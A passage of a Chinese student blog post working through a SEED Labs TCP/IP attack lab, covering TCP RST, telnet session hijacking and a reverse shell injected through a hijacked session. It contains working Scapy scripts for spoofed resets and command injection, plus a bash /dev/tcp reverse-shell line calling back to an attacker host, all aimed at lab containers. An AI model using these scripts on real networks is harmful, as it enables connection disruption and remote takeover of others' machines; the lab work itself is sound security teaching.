<p><strong>手动发起攻击：</strong>请使用 Scapy 进行 TCP RST
攻击。下面提供了一段骨架代码。您需要将 @@@@ 替换为实际值（可以使用
Wireshark 获取）：</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500444.png" srcset="/img/loading.gif" lazyload
alt="image-20231228144944088" />
<figcaption aria-hidden="true">image-20231228144944088</figcaption>
</figure>
<p><strong>可选：自动发起攻击。</strong>我们鼓励学生编写一个程序，利用嗅探和欺骗技术自动发起攻击。与手动方法不同的是，我们从嗅探数据包中获取所有参数，因此整个攻击过程都是自动化的。请确保在使用
Scapy 的嗅探函数时，不要忘记设置 iface 参数。</p>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>开启wireshark进行监听，用HostB（10.9.0.6）向受害者（10.9.0.5）发起telnet远程连接，成功登录后，查看最后一个telnet数据包（本例中为受害者→user1），从中获取源IP、源端口、目的IP、目的端口、Next
sequence number等信息。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124940.png" srcset="/img/loading.gif" lazyload
alt="image-20231122110159723" />
<figcaption aria-hidden="true">image-20231122110159723</figcaption>
</figure>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124941.png" srcset="/img/loading.gif" lazyload
alt="image-20231122110215325" />
<figcaption aria-hidden="true">image-20231122110215325</figcaption>
</figure></li>
<li><p>编写代码，伪装成受害者机器，向HostB发送RST数据包，断开连接。seq为Next
sequence number。伪造的RST数据包：需要正确设置以下字段：</p>
<ul>
<li>源IP地址，源端口</li>
<li>目的IP地址，目的端口</li>
<li>Sequence number（在接收器窗口内）</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br>ip = IP(src=<span class="hljs-string">&quot;10.9.0.5&quot;</span>, dst=<span class="hljs-string">&quot;10.9.0.6&quot;</span>)<br>tcp = TCP(sport=<span class="hljs-number">23</span>, dport=<span class="hljs-number">34884</span>, flags=<span class="hljs-string">&quot;R&quot;</span>, seq=<span class="hljs-number">3191509165</span>)<br>pkt = ip/tcp<br>ls(pkt)<br>send(pkt, verbose=<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>实施攻击，成功断开连接。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124942.png" srcset="/img/loading.gif" lazyload
alt="image-20231122110442761" />
<figcaption aria-hidden="true">image-20231122110442761</figcaption>
</figure></li>
<li><p>编写自动化攻击脚本，使用 Scapy
来监听网络接口上的TCP数据包，并自动执行TCP
RST攻击，中断指定的连接。构造的攻击数据包与捕获的数据包：源端口目的端口互换，源IP目的IP互换，seq即为捕获数据包的ack。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># 回调函数，用于处理每个嗅探到的数据包</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">packet_callback</span>(<span class="hljs-params">packet</span>):<br>    <span class="hljs-comment"># 检查数据包是否是TCP数据包</span><br>    <span class="hljs-keyword">if</span> TCP <span class="hljs-keyword">in</span> packet <span class="hljs-keyword">and</span> IP <span class="hljs-keyword">in</span> packet:<br>        <span class="hljs-comment"># 提取源和目标IP地址以及端口信息</span><br>        src_ip = packet[IP].src<br>        dst_ip = packet[IP].dst<br>        sport = packet[TCP].sport<br>        dport = packet[TCP].dport<br><br>        <span class="hljs-comment"># 构造TCP RST攻击数据包</span><br>        ip_layer = IP(src=dst_ip, dst=src_ip)<br>        tcp_layer = TCP(sport=dport, dport=sport, flags=<span class="hljs-string">&quot;R&quot;</span>, seq=packet[TCP].ack)<br><br>        <span class="hljs-comment"># 构造完整的数据包</span><br>        rst_packet = ip_layer / tcp_layer<br><br>        <span class="hljs-comment"># 发送TCP RST攻击数据包</span><br>        send(rst_packet, verbose=<span class="hljs-number">0</span>)<br><br><span class="hljs-comment"># 启动嗅探并设置回调函数</span><br>sniff(iface=<span class="hljs-string">&quot;br-7158a79e1f4c&quot;</span>, prn=packet_callback, store=<span class="hljs-number">0</span>, <span class="hljs-built_in">filter</span>=<span class="hljs-string">&quot;tcp&quot;</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>运行自动化攻击脚本，尝试使用telnet连接受害机，连接立即被中断。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124943.png" srcset="/img/loading.gif" lazyload
alt="image-20231122110839946" />
<figcaption aria-hidden="true">image-20231122110839946</figcaption>
</figure></li>
</ol>
<h1 id="task-3-tcp-session-hijacking">5. Task 3: TCP Session
Hijacking</h1>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500445.png" srcset="/img/loading.gif" lazyload
alt="image-20231228145252755" />
<figcaption aria-hidden="true">image-20231228145252755</figcaption>
</figure>
<p>TCP会话劫持攻击的目标是通过向现有的两个受害者之间的TCP连接（会话）注入恶意内容来劫持该连接。如果此连接是telnet会话，则攻击者可以向该会话中注入恶意命令（例如删除一个重要文件），导致受害者执行这些恶意命令。图3描述了攻击的工作原理。在这个任务中，您需要演示如何劫持两台计算机之间的telnet会话。您的目标是让telnet服务器执行您发送的恶意命令。为了任务的简单性，我们假设攻击者和受害者在同一个局域网上。</p>
<p><strong>手动发起攻击：</strong>请使用 Scapy 进行 TCP
会话劫持攻击。下面提供了一段骨架代码。您需要用实际值替换每个
@@@@；您可以使用 Wireshark 来计算应该在欺骗的 TCP
数据包的每个字段中填入什么值。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500446.png" srcset="/img/loading.gif" lazyload
alt="image-20231228145329545" />
<figcaption aria-hidden="true">image-20231228145329545</figcaption>
</figure>
<p><strong>可选：自动发起攻击。</strong>我们鼓励学生编写一个程序，利用嗅探和欺骗技术自动发起攻击。与手动方法不同的是，我们从嗅探数据包中获取所有参数，因此整个攻击过程都是自动化的。请确保在使用
Scapy 的嗅探函数时，不要忘记设置 iface 参数。</p>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>开启wireshark进行监听，用HostB（10.9.0.6）向受害者（10.9.0.5）发起telnet远程连接，查看10.9.0.5发送给10.9.0.6的最后一个数据包，从中获取源IP、源端口、目的IP、目的端口、Next
sequence number、ACK等信息。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124945.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111237654" />
<figcaption aria-hidden="true">image-20231122111237654</figcaption>
</figure></li>
<li><p>编写代码，伪装成HostB向受害者发送指令，源端口为34942，目的端口为23，seq为ACK
number，ack为Next sequence
number，执行的命令为ifconfig。伪造TCP数据包：需要正确设置以下字段：</p>
<ul>
<li>源IP地址，源端口，</li>
<li>目标IP地址，目标端口</li>
<li>序列号（在接收器窗口内）</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br>ip = IP(src=<span class="hljs-string">&quot;10.9.0.6&quot;</span>, dst=<span class="hljs-string">&quot;10.9.0.5&quot;</span>)<br>tcp = TCP(sport=<span class="hljs-number">34942</span>, dport=<span class="hljs-number">23</span>, flags=<span class="hljs-string">&quot;A&quot;</span>, seq=<span class="hljs-number">528360772</span>, ack=<span class="hljs-number">850449922</span>)<br>data = <span class="hljs-string">&quot;ifconfig\r&quot;</span><br>pkt = ip/tcp/data<br>ls(pkt)<br>send(pkt, verbose=<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>实施攻击，成功捕获到发出的数据包，以及受害者机器返回的执行ifconfig的数据。并且，远程终端被锁死。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124946.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111445796" />
<figcaption aria-hidden="true">image-20231122111445796</figcaption>
</figure>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124948.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111502560" />
<figcaption aria-hidden="true">image-20231122111502560</figcaption>
</figure></li>
<li><p>编写自动化攻击脚本，在成功登录后发送攻击数据包。注：Next sequence
number通过seq和payload相加得到。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># 存储登录状态的标志</span><br>logged_in = <span class="hljs-literal">False</span><br><br><span class="hljs-comment"># 回调函数，用于处理每个嗅探到的数据包</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">packet_callback</span>(<span class="hljs-params">packet</span>):<br>    <span class="hljs-keyword">global</span> logged_in<br>    <br>    <span class="hljs-comment"># 检查数据包是否是TCP数据包</span><br>    <span class="hljs-keyword">if</span> TCP <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> packet <span class="hljs-keyword">or</span> IP <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> packet:<br>        <span class="hljs-keyword">return</span><br>    <br>    <span class="hljs-comment"># 提取源和目标IP地址以及端口信息</span><br>    src_ip = packet[IP].src<br>    dst_ip = packet[IP].dst<br>    sport = packet[TCP].sport<br>    dport = packet[TCP].dport<br>    <br>    <span class="hljs-comment"># 提取TCP数据包的载荷</span><br>    <span class="hljs-keyword">if</span> Raw <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> packet:<br>        <span class="hljs-keyword">return</span><br>    data = packet[Raw].load<br><br>    <span class="hljs-comment"># 判断是否已成功登录</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> logged_in <span class="hljs-keyword">and</span> (<span class="hljs-string">b&quot;Welcome&quot;</span> <span class="hljs-keyword">in</span> data <span class="hljs-keyword">or</span> <span class="hljs-string">b&quot;Last login&quot;</span> <span class="hljs-keyword">in</span> data):<br>        logged_in = <span class="hljs-literal">True</span><br><br>    <span class="hljs-comment"># 如果已成功登录，构造并发送TCP Session攻击数据包</span><br>    <span class="hljs-keyword">if</span> logged_in:<br>        next_seq_number = packet[TCP].seq + <span class="hljs-built_in">len</span>(packet[TCP].payload)<br>        ip_layer = IP(src=dst_ip, dst=src_ip)<br>        tcp_layer = TCP(sport=dport, dport=sport, flags=<span class="hljs-string">&quot;A&quot;</span>, seq=packet[TCP].ack,ack=next_seq_number)<br>        attack_data = <span class="hljs-string">&quot;ifconfig\r&quot;</span><br>        attack_packet = ip_layer / tcp_layer / attack_data<br><br>        <span class="hljs-comment"># 发送攻击数据包</span><br>        send(attack_packet, verbose=<span class="hljs-number">0</span>)<br>        <br>        <span class="hljs-comment"># 攻击成功后停止嗅探</span><br>        logged_in = <span class="hljs-literal">False</span><br><br><span class="hljs-comment"># 启动嗅探并设置回调函数</span><br>sniff(iface=<span class="hljs-string">&quot;br-7158a79e1f4c&quot;</span>, prn=packet_callback, store=<span class="hljs-number">0</span>, <span class="hljs-built_in">filter</span>=<span class="hljs-string">&quot;tcp and dst host 10.9.0.6&quot;</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>运行自动化攻击脚本，在user1成功连接到受害者机器后，发送ifconig命令，并得到返回数据。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124949.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111653272" />
<figcaption aria-hidden="true">image-20231122111653272</figcaption>
</figure>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124950.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111703790" />
<figcaption aria-hidden="true">image-20231122111703790</figcaption>
</figure></li>
</ol>
<h1 id="task-4-creating-reverse-shell-using-tcp-session-hijacking">6.
Task 4: Creating Reverse Shell using TCP Session Hijacking</h1>
<p>当攻击者利用 TCP
会话劫持向受害者机器注入命令时，他们并不希望在受害者机器上运行一个简单的命令，而是希望运行许多命令。显然，通过
TCP
会话劫持来运行这些命令是很不方便的，攻击者想要达到的目的是利用攻击来设置后门，这样他们就可以利用这个后门方便地进行进一步的破坏。</p>
<p>设置后门的典型方法是从受害者机器上运行反向 shell，让攻击者通过 shell
访问受害者机器。反向 shell 是在远程机器上运行的 shell
进程，可连接回攻击者的机器。一旦远程机器被入侵，攻击者就可以方便地访问远程机器。</p>
<p>下面，我们将展示如果可以直接在受害者机器（即服务器机器）上运行命令，我们如何设置反向shell。在
TCP
会话劫持攻击中，攻击者无法直接在受害者机器上运行命令，因此他们的工作就是通过会话劫持攻击运行反向
shell 命令。在本任务中，学生需要证明他们能够实现这一目标。</p>
<p>要让远程机器上的 bash shell
连接回攻击者的机器，攻击者需要一个进程在指定端口上等待连接。在本例中，我们将使用
netcat。该程序允许我们指定一个端口号，并监听该端口上的连接。在下面的演示中，我们展示了两个窗口，每个窗口来自不同的机器。上面的窗口是运行
netcat（简称 nc）的攻击机器 10.9.0.1，监听端口为
9090。下面的窗口是受害者机器 10.9.0.5，我们键入反向 shell 命令。反向
shell 一经执行，顶部窗口就会显示我们得到了一个 shell。这是一个反向
shell，即在 10.9.0.5 上运行。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500447.png" srcset="/img/loading.gif" lazyload
alt="image-20231228145730767" />
<figcaption aria-hidden="true">image-20231228145730767</figcaption>
</figure>
<p>下文将简要介绍反向 shell 命令。详细说明可参阅 SEED 一书。</p>
<ul>
<li>"/bin/bash -i"：i 代表交互式，意思是 shell 必须是交互式的（必须提供
shell 提示）。</li>
<li>"&gt;/dev/tcp/10.9.0.1/9090"：这会将 shell 的输出（stdout）重定向到
10.9.0.1 的端口 9090 的 tcp 连接。输出 stdout 由文件描述符 1 表示。</li>
<li>"0&lt;&amp;1":文件描述符 0 代表标准输入 (stdin)。这会导致 shell 的
stdin 从 tcp 连接中获取。</li>
<li>"2&gt;&amp;1":文件描述符 2 代表标准错误
stderr。这会导致错误输出重定向到 tcp 连接。</li>
</ul>
<p>总之，"/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1
2&gt;&amp;1 "启动了一个 bash shell，其输入来自一个 tcp
连接，标准输出和错误输出被重定向到同一个 tcp 连接。</p>
<p>在上面的演示中，当在 10.9.0.5 上执行 bash shell 命令时，它会连接回在
10.9.0.1 上启动的 netcat 进程。这可以通过 netcat 显示的 "Connection
received on 10.9.0.5"（在 10.9.0.5 上收到的连接）信息确认。</p>
<p>上面的描述说明了如果您有访问目标计算机（即我们设置中的 telnet
服务器）的权限，可以如何设置反向
shell，但在本任务中，您没有这种权限。您的任务是对用户和目标服务器之间的现有
telnet 会话发起 TCP
会话劫持攻击。您需要向被劫持的会话注入恶意命令，以便在目标服务器上获得反向
shell。</p>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>攻击机使用netcat监听9090端口。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124951.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111802252" />
<figcaption aria-hidden="true">image-20231122111802252</figcaption>
</figure></li>
<li><p>开启wireshark进行监听，用HostB（10.9.0.6）向受害者（10.9.0.5）发起telnet远程连接，查看10.9.0.5发送给10.9.0.6的最后一个数据包，从中获取源IP、源端口、目的IP、目的端口、Next
sequence number、ACK等信息。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124952.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111842134" />
<figcaption aria-hidden="true">image-20231122111842134</figcaption>
</figure></li>
<li><p>代码流程与Task3类似，只是将传递的data改为reverse
shell命令。根据上面捕获的数据包进行填充。注：<code>&gt;</code>输出重定向；<code>&lt;</code>输入重定向。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124953.png" srcset="/img/loading.gif" lazyload
alt="image-20231122112215885" />
<figcaption aria-hidden="true">image-20231122112215885</figcaption>
</figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br>ip = IP(src=<span class="hljs-string">&quot;10.9.0.6&quot;</span>, dst=<span class="hljs-string">&quot;10.9.0.5&quot;</span>)<br>tcp = TCP(sport=<span class="hljs-number">35130</span>, dport=<span class="hljs-number">23</span>, flags=<span class="hljs-string">&quot;A&quot;</span>, seq=<span class="hljs-number">2492791675</span>, ack=<span class="hljs-number">2941888300</span>)<br>data = <span class="hljs-string">&quot;/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1\r&quot;</span><br>pkt = ip/tcp/data<br>ls(pkt)<br>send(pkt, verbose=<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>执行代码，成功得到反弹shell。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124954.png" srcset="/img/loading.gif" lazyload
alt="image-20231122111916437" />
<figcaption aria-hidden="true">image-20231122111916437</figcaption>
</figure></li>
</ol>
<p>参考教程：</p>
<ol type="1">
<li><a
target="_blank" rel="noopener" href="https://seanxz401.github.io/2022/12/31/网络攻防-TCP攻击/#Task2-RST">网络攻防-TCP攻击
- Sean's Blog (seanxz401.github.io)</a></li>
<li><a
target="_blank" rel="noopener" href="https://blog.csdn.net/l4kjih3gfe2dcba1/article/details/126532697">TCP/IP
Attack Lab（SEED实验）_winnower-sliff的博客-CSDN博客</a></li>
<li>https://www.jianshu.com/p/ff26312e67a9</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/SEED-LABS/" class="category-chain-item">SEED-LABS</a>
  
  
    <span>></span>
    
  <a href="/categories/SEED-LABS/Network-Security/" class="category-chain-item">Network Security</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>TCP/IP Attack</div>
      <div>http://example.com/2023/11/22/SEED-LABS/Network Security/TCP_IP Attack/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>kaikaikai</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年11月22日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/11/25/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90/%E7%90%86%E8%AE%BA%E7%AF%87/CH05%E5%88%86%E6%9E%90%E6%81%B6%E6%84%8FWindows%E7%A8%8B%E5%BA%8F/" title="CH05-分析恶意Windows程序">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">CH05-分析恶意Windows程序</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/11/18/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/%E5%AE%9E%E8%B7%B5%E7%AF%87/Webshell%E6%A3%80%E6%B5%8B/" title="Webshell检测">
                        <span class="hidden-mobile">Webshell检测</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
